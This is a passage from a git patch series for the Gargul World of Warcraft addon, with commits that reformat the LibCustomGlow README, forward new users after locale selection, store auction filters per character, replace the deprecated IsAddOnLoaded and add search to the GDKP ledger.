xOffset[, yOffset[, border[ ,key]]]]]]]])` Starts glow over target frame with set parameters: -frame - target frame to set glowing; -color - {r,g,b,a}, color of lines and opacity, from 0 to 1. Defaul value is {0.95, 0.95, 0.32, 1}; -N - number of lines. Defaul value is 8; -frequency - frequency, set to negative to inverse direction of rotation. Default value is 0.25; -length - length of lines. Default value depends on region size and number of lines; -th - thickness of lines. Default value is 2; -xOffset,yOffset - offset of glow relative to region border; -border - set to true to create border under lines; -key - key of glow, allows for multiple glows on one frame; -PixelGlow_Stop(frame[, key]) +- `frame` - target frame to set glowing; +- `color` - {r,g,b,a}, color of lines and opacity, from 0 to 1. Default value is {0.95, 0.95, 0.32, 1}; +- `N` - number of lines. Default value is 8; +- `frequency` - frequency, set to negative to inverse direction of rotation. Default value is 0.25; +- `length` - length of lines. Default value depends on region size and number of lines; +- `th` - thickness of lines. Default value is 2; +- `xOffset`,`yOffset` - offset of glow relative to region border; +- `border` - set to true to create border under lines; +- `key` - key of glow, allows for multiple glows on one frame; + +--- + +- `PixelGlow_Stop(frame[, key])` Stops glow with set key over target frame -  +## AutoCast Glow -AutoCastGlow_Start(frame[, color[, N[, frequency[, scale[, xOffset[, yOffset[, key]]]]]]]) +- `AutoCastGlow_Start(frame[, color[, N[, frequency[, scale[, xOffset[, yOffset[, key]]]]]]])` Starts glow over target frame with set parameters: -frame - target frame to set glowing; -color - {r,g,b,a}, color of particles and opacity, from 0 to 1. Defaul value is {0.95, 0.95, 0.32, 1}; -N - number of particle groups. Each group contains 4 particles. Defaul value is 4; -frequency - frequency, set to negative to inverse direction of rotation. Default value is 0.125; -scale - scale of particles; -xOffset,yOffset - offset of glow relative to region border; -key - key of glow, allows for multiple glows on one frame; -AutoCastGlow_Stop(frame[, key]) +- `frame` - target frame to set glowing; +- `color` - {r,g,b,a}, color of particles and opacity, from 0 to 1. Default value is {0.95, 0.95, 0.32, 1}; +- `N` - number of particle groups. Each group contains 4 particles. Default value is 4; +- `frequency` - frequency, set to negative to inverse direction of rotation. Default value is 0.125; +- `scale` - scale of particles; +- `xOffset`,`yOffset` - offset of glow relative to region border; +- `key` - key of glow, allows for multiple glows on one frame; - Stops glow with set key over target frame +--- -  +- `AutoCastGlow_Stop(frame[, key])` -Blizzard glow is based heavily on https://www.wowace.com/projects/libbuttonglow-1-0 +Stops glow with set key over target frame -ButtonGlow_Start(frame[, color[, frequency]]]) +## ButtonGlow + +Blizzard glow is based heavily on  + +- `ButtonGlow_Start(frame[, color[, frequency]]])` + +Starts glow over target frame with set parameters: - Starts glow over target frame with set parameters: +- `frame` - target frame to set glowing; +- `color` - {r,g,b,a}, color of particles and opacity, from 0 to 1. Default value is {0.95, 0.95, 0.32, 1}; +- `frequency` - frequency. Default value is 0.125; -frame - target frame to set glowing; -color - {r,g,b,a}, color of particles and opacity, from 0 to 1. Defaul value is {0.95, 0.95, 0.32, 1}; -frequency - frequency. Default value is 0.125; -ButtonGlow_Stop(frame) +--- -Stops glow over target frame +- `ButtonGlow_Stop(frame)` -  + Stops glow over target frame diff --git a/Libs/LibCustomGlow-1.0/cspell.json b/Libs/LibCustomGlow-1.0/cspell.json new file mode 100644 index 00000000..23171fff --- /dev/null +++ b/Libs/LibCustomGlow-1.0/cspell.json @@ -0,0 +1,12 @@ +{ + "version": "0.2", + "language": "en-US", + "ignorePaths": ["LICENSE"], + "words": [ + "Desaturated", + "issecurevariable", + "Leppkes", + "luacheck", + "tremove" + ] +} From 71f5d4d89939c59a8f6b5303a12bf7355aa66d92 Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Mon, 5 Aug 2024 20:54:53 +0200 Subject: [PATCH 02/11] Made sure new users are forwarded to Gargul's main screen after picking a chat locale --- Classes/Commands.lua | 7 +++---- Interface/Locale.lua | 9 ++++++++- 2 files changed, 11 insertions(+), 5 deletions(-) diff --git a/Classes/Commands.lua b/Classes/Commands.lua index 05b0dbea..e2fe4a49 100644 --- a/Classes/Commands.lua +++ b/Classes/Commands.lua @@ -216,8 +216,8 @@ GL.Commands = GL.Commands or { end, -- Open the locale selector - locale = function () - GL.Interface.Locale:open(); + locale = function (...) + GL.Interface.Locale:open(...); end, -- Open the minimap button settings @@ -319,6 +319,7 @@ function Commands:_dispatch(str) -- User entered "/gl" with no additional arguments, open localization or settings window if (not str or #str < 1) then command = GL.Settings:get("chatLocale") and "settings" or "locale"; + argumentString = "1"; end -- Make sure commands are case insensitive (Busmonstret = dumdum) @@ -352,5 +353,3 @@ function Commands:_dispatch(str) self:help(); end end; - -GL:debug("Commands.lua"); \ No newline at end of file diff --git a/Interface/Locale.lua b/Interface/Locale.lua index e913b950..79f2d808 100644 --- a/Interface/Locale.lua +++ b/Interface/Locale.lua @@ -11,6 +11,7 @@ local Settings = GL.Settings; ---@class LocaleInterface GL.Interface.Locale = { + forwardToSettings = false, isVisible = false, windowName = "Gargul.Interface.Locale.Window", }; @@ -19,7 +20,8 @@ GL.Interface.Locale = { local Locale = GL.Interface.Locale; ---@return table -function Locale:open() +function Locale:open(forwardToSettings) + self.forwardToSettings = forwardToSettings ~= nil; self.isVisible = true; local Window = _G[self.windowName] or self:build(); @@ -108,6 +110,11 @@ function Locale:build() OkButton:SetScript("OnClick", function () Settings:set("chatLocale", Locales:GetValue() or "enUS"); self:close(); + + if (self.forwardToSettings) then + self.forwardToSettings = false; + GL.Settings:draw(); + end end); local CancelButton = Interface:dynamicPanelButton(Window, L.CANCEL); From 0020610014f757b5f858b0b55a427cae88f83761 Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Mon, 5 Aug 2024 22:01:07 +0200 Subject: [PATCH 03/11] Gargul now saves multi auction filters per character --- Data/DefaultSettings.lua | 9 ----- Interface/GDKP/MultiAuction/Client.lua | 52 +++++++++++++------------- 2 files changed, 26 insertions(+), 35 deletions(-) diff --git a/Data/DefaultSettings.lua b/Data/DefaultSettings.lua index 530c6a4b..3c3b5dc7 100644 --- a/Data/DefaultSettings.lua +++ b/Data/DefaultSettings.lua @@ -242,15 +242,6 @@ GL.Data.DefaultSettings = { minimumFillItemLevel = nil, minimumFillQuality = 4, time = 600, - - Filters = { - Mods = { - agility = nil, - intellect = nil, - spirit = nil, - strength = nil, - }, - }, }, }, TMB = { diff --git a/Interface/GDKP/MultiAuction/Client.lua b/Interface/GDKP/MultiAuction/Client.lua index da932596..b7ade2da 100644 --- a/Interface/GDKP/MultiAuction/Client.lua +++ b/Interface/GDKP/MultiAuction/Client.lua @@ -253,10 +253,10 @@ function ClientInterface:build() { text = "Unusable", checked = function () - return Settings:get("GDKP.MultiAuction.Filters.unusable", false); + return Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.unusable", false); end, func = function (Entry) - Settings:set("GDKP.MultiAuction.Filters.unusable", Entry.checked); + Settings:set("GDKP.MultiAuction." .. GL.User.id .. ".Filters.unusable", Entry.checked); filter(); end, }, @@ -265,40 +265,40 @@ function ClientInterface:build() { text = "Cloth", checked = function () - return Settings:get(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Cloth)); + return Settings:get(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Cloth)); end, func = function (Entry) - Settings:set(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Cloth), Entry.checked); + Settings:set(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Cloth), Entry.checked); filter(); end, }, { text = "Leather", checked = function () - return Settings:get(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Leather)); + return Settings:get(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Leather)); end, func = function (Entry) - Settings:set(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Leather), Entry.checked); + Settings:set(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Leather), Entry.checked); filter(); end, }, { text = "Mail", checked = function () - return Settings:get(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Mail)); + return Settings:get(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Mail)); end, func = function (Entry) - Settings:set(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Mail), Entry.checked); + Settings:set(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Mail), Entry.checked); filter(); end, }, { text = "Plate", checked = function () - return Settings:get(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Plate)); + return Settings:get(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Plate)); end, func = function (Entry) - Settings:set(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Plate), Entry.checked); + Settings:set(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Plate), Entry.checked); filter(); end, }, @@ -307,10 +307,10 @@ function ClientInterface:build() { text = ITEM_MOD_AGILITY_SHORT, checked = function () - return Settings:get("GDKP.MultiAuction.Filters.Mods.agility"); + return Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.agility"); end, func = function (Entry) - Settings:set("GDKP.MultiAuction.Filters.Mods.agility", Entry.checked or nil); + Settings:set("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.agility", Entry.checked or nil); filter(); end, @@ -318,10 +318,10 @@ function ClientInterface:build() { text = ITEM_MOD_INTELLECT_SHORT, checked = function () - return Settings:get("GDKP.MultiAuction.Filters.Mods.intellect"); + return Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.intellect"); end, func = function (Entry) - Settings:set("GDKP.MultiAuction.Filters.Mods.intellect", Entry.checked or nil); + Settings:set("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.intellect", Entry.checked or nil); filter(); end, @@ -329,10 +329,10 @@ function ClientInterface:build() { text = ITEM_MOD_SPIRIT_SHORT, checked = function () - return Settings:get("GDKP.MultiAuction.Filters.Mods.spirit"); + return Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.spirit"); end, func = function (Entry) - Settings:set("GDKP.MultiAuction.Filters.Mods.spirit", Entry.checked or nil); + Settings:set("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.spirit", Entry.checked or nil); filter(); end, @@ -340,10 +340,10 @@ function ClientInterface:build() { text = ITEM_MOD_STRENGTH_SHORT, checked = function () - return Settings:get("GDKP.MultiAuction.Filters.Mods.strength"); + return Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.strength"); end, func = function (Entry) - Settings:set("GDKP.MultiAuction.Filters.Mods.strength", Entry.checked or nil); + Settings:set("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods.strength", Entry.checked or nil); filter(); end, @@ -352,20 +352,20 @@ function ClientInterface:build() { text = L.BIND_ON_EQUIP_ABBR, checked = function () - return Settings:get("GDKP.MultiAuction.Filters.BOE"); + return Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.BOE"); end, func = function (Entry) - Settings:set("GDKP.MultiAuction.Filters.BOE", Entry.checked); + Settings:set("GDKP.MultiAuction." .. GL.User.id .. ".Filters.BOE", Entry.checked); filter(); end, }, { text = "Shields", checked = function () - return Settings:get(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Shield)); + return Settings:get(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Shield)); end, func = function (Entry) - Settings:set(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Shield), Entry.checked); + Settings:set(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, Enum.ItemArmorSubclass.Shield), Entry.checked); filter(); end, }, @@ -1419,14 +1419,14 @@ function ClientInterface:filterAndSort() if (self.enableFilters) then -- Hide unusable items if (not ItemRow._Details.canUseItem - and Settings:get("GDKP.MultiAuction.Filters.unusable") == true + and Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.unusable") == true ) then return; end -- Hide BOEs if (ItemRow._Details.isBOE - and Settings:get("GDKP.MultiAuction.Filters.BOE") == true + and Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.BOE") == true ) then return; end @@ -1434,13 +1434,13 @@ function ClientInterface:filterAndSort() -- Hide unwanted armor types if (ItemRow._Details.classID == Enum.ItemClass.Armor and ItemRow._Details.inventoryType ~= "INVTYPE_CLOAK" - and Settings:get(("GDKP.MultiAuction.Filters.%s-%s"):format(Enum.ItemClass.Armor, ItemRow._Details.subclassID)) == true + and Settings:get(("GDKP.MultiAuction." .. GL.User.id .. ".Filters.%s-%s"):format(Enum.ItemClass.Armor, ItemRow._Details.subclassID)) == true ) then return; end -- Hide unwanted item modifiers - local FilteredMods = Settings:get("GDKP.MultiAuction.Filters.Mods"); + local FilteredMods = Settings:get("GDKP.MultiAuction." .. GL.User.id .. ".Filters.Mods"); if (not GL:empty(FilteredMods)) then local ItemMods = GL:itemModifiers(ItemRow._Details.link); From 5786382d630ee39519b2ed0a68c7ae8dea1cf1a7 Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Mon, 5 Aug 2024 22:01:27 +0200 Subject: [PATCH 04/11] Replaced deprecated `IsAddOnLoaded` --- bootstrap.lua | 12 +++--------- 1 file changed, 3 insertions(+), 9 deletions(-) diff --git a/bootstrap.lua b/bootstrap.lua index b490e24f..617ca0a1 100644 --- a/bootstrap.lua +++ b/bootstrap.lua @@ -84,8 +84,6 @@ function GL:bootstrap(_, _, addonName) end --- Callback to be fired when the addon is completely loaded ---- ----@return void function GL:_init() if (self.isSoD -- Taiwan is excluded apparently: https://tw.forums.blizzard.com/zh/wow/t/gdkp/12240 @@ -215,12 +213,12 @@ GL.Ace:RegisterChatCommand("gdkp", function (...) end); --- Announce conflicting addons, if any ---- ----@return void function GL:announceConflictingAddons() local ConflictingAddons = {}; + local addonLoadedFunction = IsAddOnLoaded or C_AddOns.IsAddOnLoaded; + for _, addon in pairs(GL.Data.Constants.GargulConflictsWith) do - if (IsAddOnLoaded(addon)) then + if (addonLoadedFunction(addon)) then tinsert(ConflictingAddons, addon); end end @@ -236,8 +234,6 @@ function GL:announceConflictingAddons() end --- Keep track of when native UI elements (like AH/mailbox) are active ---- ----@return void function GL:hookNativeWindowEvents() -- Make sure to reset window states when zoning GL.Events:register("BootstrapPlayerEnteringWorld", "PLAYER_ENTERING_WORLD", function () @@ -323,8 +319,6 @@ function GL:hookNativeWindowEvents() end --- We hook all the tooltip data (tmb/softres etc) to a single event to make caching easier ---- ----@return void function GL:hookTooltipSetItemEvents() GL.onTooltipSetItemFunc = function(Tooltip) -- No valid item tooltip was provided From 782a856728ed443843477dbd32bd72f286be0101 Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Mon, 5 Aug 2024 23:56:54 +0200 Subject: [PATCH 05/11] Made it possible to filter auctions in the /gdkp ledger --- Interface/GDKP/Overview.lua | 385 ++++++++++++++++++++---------------- 1 file changed, 214 insertions(+), 171 deletions(-) diff --git a/Interface/GDKP/Overview.lua b/Interface/GDKP/Overview.lua index 64c2f4e0..6c1865f4 100644 --- a/Interface/GDKP/Overview.lua +++ b/Interface/GDKP/Overview.lua @@ -33,9 +33,12 @@ local GDKPAuction = GL.GDKP.Auction; local SESSION_ROWS = 22; local HEIGHT_PER_SESSION_ROW = 18; -GL:tableSet(GL, "Interface.GDKP.Overview", { +---@class GDKPOverview +local Overview = { _initialized = false, + isVisible = false, + phrase = nil, selectedSession = nil, styleWindowAfterResize = nil, @@ -44,12 +47,11 @@ GL:tableSet(GL, "Interface.GDKP.Overview", { -- Released buttons are added to this pool so that we can reuse them later ButtonPool = {}, -}); +}; ----@class GDKPOverview -local Overview = Interface.GDKP.Overview; ---@type GDKPOverview +---@type GDKPOverview +GL.Interface.GDKP.Overview = Overview; ----@return void function Overview:_init() if (self._initialized) then return; @@ -90,7 +92,6 @@ function Overview:_init() end); end ----@return void function Overview:sessionChanged() local Session = self:getSelectedSession(); @@ -132,7 +133,6 @@ function Overview:sessionChanged() self:updatePot(); end ----@return void function Overview:updatePot() local Session = self:getSelectedSession(); @@ -150,7 +150,6 @@ function Overview:updatePot() Pot:SetText(string.format("|cFF%s%s|r", Interface.Colors.ROGUE, pot)); end ----@return void function Overview:open() if (not GL.GDKPIsAllowed) then return GL:error(L.GDKPS_ARE_NOT_ALLOWED); @@ -175,8 +174,6 @@ function Overview:open() end --- Build the GDKP overview. We only do this once and reuse it when reopened ---- ----@return void function Overview:build() local Window = Interface:get(self, "GDKPOverview"); @@ -368,7 +365,7 @@ function Overview:build() "GL.GDKP_SESSION_UNLOCKED", }, }); - AddGoldButton:SetPoint("TOP", ScrollFrameHolder.frame, "TOP", -9, -7); + AddGoldButton:SetPoint("TOP", ScrollFrameHolder.frame, "TOP", -30, -7); ----[[ LIST VIEW BUTTON ]] local ListViewButton = Interface:createButton(ScrollFrameHolder, { @@ -377,7 +374,7 @@ function Overview:build() GL.Interface.GDKP.LedgerList:open(self.selectedSession); end, tooltip = L.GDKP_OVERVIEW_LEDGER_TOOLTIP, - normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/eye", + normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/award", updateOn = { "GL.GDKP_OVERVIEW_SESSION_CHANGED", "GL.GDKP_OVERVIEW_SESSION_CHANGED", "GL.GDKP_OVERVIEW_SESSIONS_REFRESHED", "GL.GDKP_AUCTION_CHANGED", }, update = function (self) self:SetEnabled(not GL:empty(GL:tableGet(Overview:getSelectedSession() or {}, "Auctions"))); @@ -385,6 +382,44 @@ function Overview:build() }); ListViewButton:SetPoint("TOPLEFT", AddGoldButton, "TOPRIGHT", 2, 0); + ----[[ SEARCH BUTTON ]] + local SearchButton; + SearchButton = Interface:createButton(ScrollFrameHolder, { + onClick = function (Button) + if (self.phrase) then + self.phrase = nil; + self:refreshLedger(); + SearchButton.normalTexture:SetTexture("Interface/AddOns/Gargul/Assets/Buttons/eye"); + Interface:addTooltip(SearchButton, "Search by item or player name"); + + return; + end + + GL.Interface.Dialogs.ConfirmWithSingleInputDialog:open{ + question = "Search by item name or player name", + OnYes = function (phrase) + if (GL:empty(phrase)) then + return; + end + + self.phrase = phrase; + self:refreshLedger(); + + SearchButton.normalTexture:SetTexture("Interface/AddOns/Gargul/Assets/Buttons/restore"); + Interface:addTooltip(SearchButton, "Clear search"); + end, + focus = true, + }; + end, + normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/eye", + updateOn = { "GL.GDKP_OVERVIEW_SESSION_CHANGED", "GL.GDKP_OVERVIEW_SESSION_CHANGED", "GL.GDKP_OVERVIEW_SESSIONS_REFRESHED" }, + update = function (Button) + Button:SetEnabled(not GL:empty(GL:tableGet(Overview:getSelectedSession() or {}, "Auctions"))); + end, + }); + Interface:addTooltip(SearchButton, "Search by item or player name"); + SearchButton:SetPoint("TOPLEFT", ListViewButton, "TOPRIGHT", 2, 0); + Interface:set(self, "Title", Title); Interface:set(self, "Note", Note); Interface:set(self, "SectionWrapper", ScrollFrameHolder); @@ -496,7 +531,6 @@ function Overview:build() return Window; end ----@return void function Overview:close() local Window = Interface:get(self, "GDKPOverview"); @@ -510,7 +544,6 @@ function Overview:close() self.isVisible = false; end ----@return void function Overview:closeSubWindows() Interface.GDKP.CreateSession:close(); Interface.GDKP.EditSession:close(); @@ -531,7 +564,6 @@ function Overview:getSelectedSession() return GDKPSession:byID(sessionIdentifier); end ----@return void function Overview:refreshLedger() local LockIcon = Interface:get(self, "Icon.LockIcon"); LockIcon.frame:Show(); @@ -624,187 +656,198 @@ function Overview:refreshLedger() -- Add placeholders for all the item icons and labels for _, Auction in pairs(Auctions) do - local price = Auction.price or 0; - local auctionWasDeleted = not Auction.price; - local concernsManualAdjustment = Auction.itemID == Constants.GDKP.potIncreaseItemID; + (function () + if (self.phrase + and not GL:empty(self.phrase) + and (not GL:strContains(Auction.itemLink, self.phrase) + and not GL:strContains(Auction.Winner.name, self.phrase) + ) + ) then + return; + end - -- This entry should always exist, if it doesn't something went wrong (badly) - local ItemEntry = GL:getCachedItem(Auction.itemLink); + local price = Auction.price or 0; + local auctionWasDeleted = not Auction.price; + local concernsManualAdjustment = Auction.itemID == Constants.GDKP.potIncreaseItemID; - if (GL:empty(ItemEntry)) then - break; - end + -- This entry should always exist, if it doesn't something went wrong (badly) + local ItemEntry = GL:getCachedItem(Auction.itemLink); - -- [[ SET DETAILS ]] - local iconPath = ItemEntry.icon; - local itemLabel; + if (GL:empty(ItemEntry)) then + return; + end - if (concernsManualAdjustment) then - iconPath = "Interface/AddOns/Gargul/Assets/Icons/achievement_guildperk_cashflow"; - end + -- [[ SET DETAILS ]] + local iconPath = ItemEntry.icon; + local itemLabel; - local ItemRow = AceGUI:Create("SimpleGroup"); - ItemRow:SetLayout("FLOW") - ItemRow:SetHeight(Settings:get("GDKP.ledgerAuctionScale")); - ItemRow:SetFullWidth(true); - Details:AddChild(ItemRow); - - --[[ - ITEM ICON - ]] - local ItemIcon = AceGUI:Create("Icon"); - ItemIcon:SetWidth(Settings:get("GDKP.ledgerAuctionScale")); - ItemIcon:SetHeight(Settings:get("GDKP.ledgerAuctionScale")); - ItemIcon:SetImageSize(Settings:get("GDKP.ledgerAuctionScale"), Settings:get("GDKP.ledgerAuctionScale")); - ItemIcon:SetImage(iconPath); - ItemRow:AddChild(ItemIcon); - ItemIcon:SetCallback("OnEnter", function() if (concernsManualAdjustment) then - return; + iconPath = "Interface/AddOns/Gargul/Assets/Icons/achievement_guildperk_cashflow"; end - GameTooltip:SetOwner(ItemIcon.frame, "ANCHOR_TOP"); - GameTooltip:SetHyperlink(Auction.itemLink); - GameTooltip:Show(); - end); - ItemIcon:SetCallback("OnLeave", function() - GameTooltip:Hide(); - end); - ItemIcon:SetCallback("OnClick", function (_, _, mouseButtonPressed) - HandleModifiedItemClick(Auction.itemLink, mouseButtonPressed); - end); + local ItemRow = AceGUI:Create("SimpleGroup"); + ItemRow:SetLayout("FLOW") + ItemRow:SetHeight(Settings:get("GDKP.ledgerAuctionScale")); + ItemRow:SetFullWidth(true); + Details:AddChild(ItemRow); + + --[[ + ITEM ICON + ]] + local ItemIcon = AceGUI:Create("Icon"); + ItemIcon:SetWidth(Settings:get("GDKP.ledgerAuctionScale")); + ItemIcon:SetHeight(Settings:get("GDKP.ledgerAuctionScale")); + ItemIcon:SetImageSize(Settings:get("GDKP.ledgerAuctionScale"), Settings:get("GDKP.ledgerAuctionScale")); + ItemIcon:SetImage(iconPath); + ItemRow:AddChild(ItemIcon); + ItemIcon:SetCallback("OnEnter", function() + if (concernsManualAdjustment) then + return; + end - --[[ - ITEM ICON/LABEL SPACER - ]] - local ItemSpacer = AceGUI:Create("SimpleGroup"); - ItemSpacer:SetLayout("FILL") - ItemSpacer:SetWidth(10); - ItemSpacer:SetHeight(Settings:get("GDKP.ledgerAuctionScale")); - ItemRow:AddChild(ItemSpacer); - - --[[ - ITEM LABEL - ]] - local ItemLabel = AceGUI:Create("Label"); - ItemLabel:SetFontObject(_G["GameFontNormalSmall"]); - ItemLabel:SetWidth(268); - - -- Item was sold - if (not auctionWasDeleted) then - price = price or 0; - if (concernsManualAdjustment) then - local mutator = L.GDKP_OVERVIEW_MUTATION_ADDED; - if (price < 0) then - mutator = L.GDKP_OVERVIEW_MUTATION_REMOVED; + GameTooltip:SetOwner(ItemIcon.frame, "ANCHOR_TOP"); + GameTooltip:SetHyperlink(Auction.itemLink); + GameTooltip:Show(); + end); + ItemIcon:SetCallback("OnLeave", function() + GameTooltip:Hide(); + end); + ItemIcon:SetCallback("OnClick", function (_, _, mouseButtonPressed) + HandleModifiedItemClick(Auction.itemLink, mouseButtonPressed); + end); + + --[[ + ITEM ICON/LABEL SPACER + ]] + local ItemSpacer = AceGUI:Create("SimpleGroup"); + ItemSpacer:SetLayout("FILL") + ItemSpacer:SetWidth(10); + ItemSpacer:SetHeight(Settings:get("GDKP.ledgerAuctionScale")); + ItemRow:AddChild(ItemSpacer); + + --[[ + ITEM LABEL + ]] + local ItemLabel = AceGUI:Create("Label"); + ItemLabel:SetFontObject(_G["GameFontNormalSmall"]); + ItemLabel:SetWidth(268); + + -- Item was sold + if (not auctionWasDeleted) then + price = price or 0; + if (concernsManualAdjustment) then + local mutator = L.GDKP_OVERVIEW_MUTATION_ADDED; + if (price < 0) then + mutator = L.GDKP_OVERVIEW_MUTATION_REMOVED; + end + + itemLabel = (L.GDKP_OVERVIEW_MUTATION_ENTRY):format( + Interface.Colors.ROGUE, + GL:goldToMoney(price), + mutator, + GL:nameFormat{ name = Auction.Winner.name, class = Auction.Winner.class, colorize = true, }, + Auction.note or "" + ); + else + itemLabel = (L.GDKP_OVERVIEW_AUCTION_ENTRY):format( + GL:nameFormat{ name = Auction.Winner.name, class = Auction.Winner.class, colorize = true, }, + Interface.Colors.ROGUE, + GL:goldToMoney(price), + Auction.itemLink + ); end - itemLabel = (L.GDKP_OVERVIEW_MUTATION_ENTRY):format( - Interface.Colors.ROGUE, - GL:goldToMoney(price), - mutator, - GL:nameFormat{ name = Auction.Winner.name, class = Auction.Winner.class, colorize = true, }, - Auction.note or "" - ); + -- Item was deleted else - itemLabel = (L.GDKP_OVERVIEW_AUCTION_ENTRY):format( - GL:nameFormat{ name = Auction.Winner.name, class = Auction.Winner.class, colorize = true, }, - Interface.Colors.ROGUE, - GL:goldToMoney(price), - Auction.itemLink - ); - end + local reason = Auction.reason; - -- Item was deleted - else - local reason = Auction.reason; + if (GL:empty(reason)) then + reason = "-"; + end - if (GL:empty(reason)) then - reason = "-"; + itemLabel = (L.GDKP_OVERVIEW_DELETED_ENTRY):format( + GL:nameFormat{ name = Auction.CreatedBy.name, class = Auction.CreatedBy.class, colorize = true, }, + reason + ); end - itemLabel = (L.GDKP_OVERVIEW_DELETED_ENTRY):format( - GL:nameFormat{ name = Auction.CreatedBy.name, class = Auction.CreatedBy.class, colorize = true, }, - reason - ); - end - - ItemLabel:SetText(itemLabel); - ItemRow:AddChild(ItemLabel); + ItemLabel:SetText(itemLabel); + ItemRow:AddChild(ItemLabel); - self.ActionButtons[Auction.ID] = {}; + self.ActionButtons[Auction.ID] = {}; - --[[ DETAILS BUTTON ]] - local Eye = Interface:createButton(ItemRow.frame, { - onClick = function() - Interface.GDKP.AuctionDetails:toggle(Session.ID, Auction.checksum); - end, - tooltip = L.DETAILS, - normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/eye", - }); - Eye:SetPoint("CENTER", ItemRow.frame, "CENTER"); - Eye:SetPoint("RIGHT", ItemRow.frame, "RIGHT", 0, 0); - self.ActionButtons[Auction.ID].DetailsButton = Eye; - - --[[ DELETE BUTTON ]] - local Restore, Delete; - if (not auctionWasDeleted) then - Delete = Interface:createButton(ItemRow.frame, { + --[[ DETAILS BUTTON ]] + local Eye = Interface:createButton(ItemRow.frame, { onClick = function() - -- Shift button was held, skip reason - if (IsShiftKeyDown()) then - GDKPAuction:delete(Session.ID, Auction.ID, "-"); - return; - end - - Interface.Dialogs.ConfirmWithSingleInputDialog:open({ - question = L.GDKP_OVERVIEW_DELETE_ENTRY_REASON, - OnYes = function (reason) - GDKPAuction:delete(Session.ID, Auction.ID, reason); - end, - }); - end, - tooltip = L.GDKP_OVERVIEW_DELETE_ENTRY_TOOLTIP, - disabledTooltip = L.GDKP_OVERVIEW_DELETE_ENTRY_DISABLED_TOOLTIP, - normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/delete", - update = function (self) - self:SetEnabled(not auctionWasDeleted and not Session.deletedAt and not Session.lockedAt); + Interface.GDKP.AuctionDetails:toggle(Session.ID, Auction.checksum); end, + tooltip = L.DETAILS, + normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/eye", }); - Delete:SetPoint("TOPRIGHT", Eye, "TOPLEFT", -2, 0); - self.ActionButtons[Auction.ID].DeleteButton = Delete; - end + Eye:SetPoint("CENTER", ItemRow.frame, "CENTER"); + Eye:SetPoint("RIGHT", ItemRow.frame, "RIGHT", 0, 0); + self.ActionButtons[Auction.ID].DetailsButton = Eye; + + --[[ DELETE BUTTON ]] + local Restore, Delete; + if (not auctionWasDeleted) then + Delete = Interface:createButton(ItemRow.frame, { + onClick = function() + -- Shift button was held, skip reason + if (IsShiftKeyDown()) then + GDKPAuction:delete(Session.ID, Auction.ID, "-"); + return; + end + + Interface.Dialogs.ConfirmWithSingleInputDialog:open({ + question = L.GDKP_OVERVIEW_DELETE_ENTRY_REASON, + OnYes = function (reason) + GDKPAuction:delete(Session.ID, Auction.ID, reason); + end, + }); + end, + tooltip = 